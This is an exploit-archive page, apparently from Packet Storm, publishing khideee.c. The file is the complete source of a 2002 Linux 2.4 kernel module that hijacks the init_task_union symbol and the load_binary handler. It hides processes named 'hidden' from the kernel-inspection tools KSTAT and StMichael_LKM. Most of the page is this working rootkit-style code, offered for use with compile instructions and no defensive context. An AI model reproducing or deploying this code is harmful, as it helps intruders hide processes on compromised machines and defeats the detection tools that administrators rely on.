exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

khideee.c

khideee.c
Posted Jul 31, 2002
Authored by Michele Dallachiesa aka xenion | Site acidlife.com

This Linux LKM allows you to hide tasks to KSTAT, a tool used to find attackers in your system by a direct analysis of the kernel through /dev/kmem. StMichael_LKM 0.10 (default installation) will not detect this. Tested on Linux 2.4.x kernels.

tags | kernel
systems | linux
SHA-256 | dc49efaef89afbc43c5d83140237d54e06f4f046160e60f98d081ee41e55de3e

khideee.c

Change Mirror Download
/*  2002-07-31#04:19
*
* HIJACKING KERNEL SYMBOLS AND FUNCTIONS USED TO LOAD BINARY FORMATS
* ------------------------------------------------------------------
*
* With this module you can hide tasks to KSTAT, tool used to find
* attakers in your system by a direct analysis of the kernel throught
* /dev/kmem. (http://www.s0ftpj.org ..)
* StMichael_LKM 0.10 (default installation) won't detect it!
*
*
* working code for 2.4.x linux kernels.
* compile: cc -c -I/usr/src/linux/include -O2 -Wall -o khideee.o khideee.c
* (will hide all tasks with ->comm == "hidden")
*
* Dallachiesa Michele aka xenion
* mail: xenion@acidlife.com
* home: http://www.acidlife.com/mayhem/tba/
*/


#define HIDDEN_COMM "hidden"


#define MODULE
#define __KERNEL__

#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/malloc.h>


struct task_struct *my_init_task;
void my_tasklist_init();
void my_tasklist_update();
void my_tasklist_hide();
void my_tasklist_free();

struct module_symbol *get_symbol_addr(const char *);
struct module_symbol *s_init_task_union;

int (*o_load_binary) (struct linux_binprm *,
struct pt_regs * regs);

int n_load_binary(struct linux_binprm *bprm,
struct pt_regs *regs);


int
init_module(void)
{

s_init_task_union = get_symbol_addr("init_task_union");

my_tasklist_init();
my_tasklist_update();

s_init_task_union->value = (unsigned long) my_init_task;

o_load_binary = init_task.next_task->binfmt->load_binary;
init_task.next_task->binfmt->load_binary = n_load_binary;

return 0;
}


void
cleanup_module(void)
{
s_init_task_union->value = (unsigned long) &init_task;
my_tasklist_free();
init_task.next_task->binfmt->load_binary = o_load_binary;
}


int
n_load_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
char *p,
*P;

my_tasklist_update();
my_tasklist_hide();

for (p = P = bprm->filename; *p != '\0'; p++)
if (*p == '/')
P = p + 1;

strncpy(my_init_task->prev_task->comm, P,
sizeof my_init_task->prev_task->comm);
my_init_task->prev_task->comm[15] = '\0';

return o_load_binary(bprm, regs);
}


struct module_symbol *
get_symbol_addr(const char *name)
{
struct module *mod;
struct module_symbol *s;
int i,
found;

for (mod = THIS_MODULE; mod->next != NULL; mod = mod->next);

for (found = 0, s = mod->syms, i = 0; i < mod->nsyms; ++i, ++s)
if (strstr(s->name, name) != NULL) {
++found;
break;
}

if (!found)
return NULL;

return s;
}


void
my_tasklist_init()
{
my_init_task =
(struct task_struct *) kmalloc(sizeof(struct task_struct),
GFP_KERNEL);
if (!my_init_task)
return;

memcpy(my_init_task, &init_task, sizeof(struct task_struct));

my_init_task->next_task = my_init_task;
my_init_task->prev_task = my_init_task;
}


void
my_tasklist_update()
{
struct task_struct *p,
*P,
*tmp;

if (!my_init_task)
return;

P = my_init_task;
p = &init_task;

if (my_init_task != my_init_task->next_task) { // not the first

while (P->next_task != my_init_task &&
p->next_task != &init_task &&
p->next_task->pid == P->next_task->pid) {
p = p->next_task;
P = P->next_task;
}

while (my_init_task->prev_task != P) {
tmp = my_init_task->prev_task;
my_init_task->prev_task = my_init_task->prev_task->prev_task;
kfree(tmp);
}

}

for (p = p->next_task, tmp = P; p != &init_task; p = p->next_task) {
P = (struct task_struct *) kmalloc(sizeof(struct task_struct),
GFP_KERNEL);
if (!P)
return;
memcpy(P, p, sizeof(struct task_struct));
P->next_task = my_init_task;
P->prev_task = tmp;
tmp->next_task = P;
tmp = P;
}

my_init_task->prev_task = P;
}


void
my_tasklist_free()
{
struct task_struct *p;

p = my_init_task;

while (p->next_task != my_init_task) {
p = p->next_task;
kfree(p->prev_task);
}

kfree(p);
}


void
my_tasklist_hide()
{
struct task_struct *p,
*tmp;

for (p = my_init_task; (p = p->next_task) != my_init_task;)
if (strcmp(p->comm, HIDDEN_COMM) == 0) {
p->prev_task->next_task = p->next_task;
p->next_task->prev_task = p->prev_task;
tmp = p;
p = p->prev_task;
kfree(tmp);
}
}


/*
* EOF
*/

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close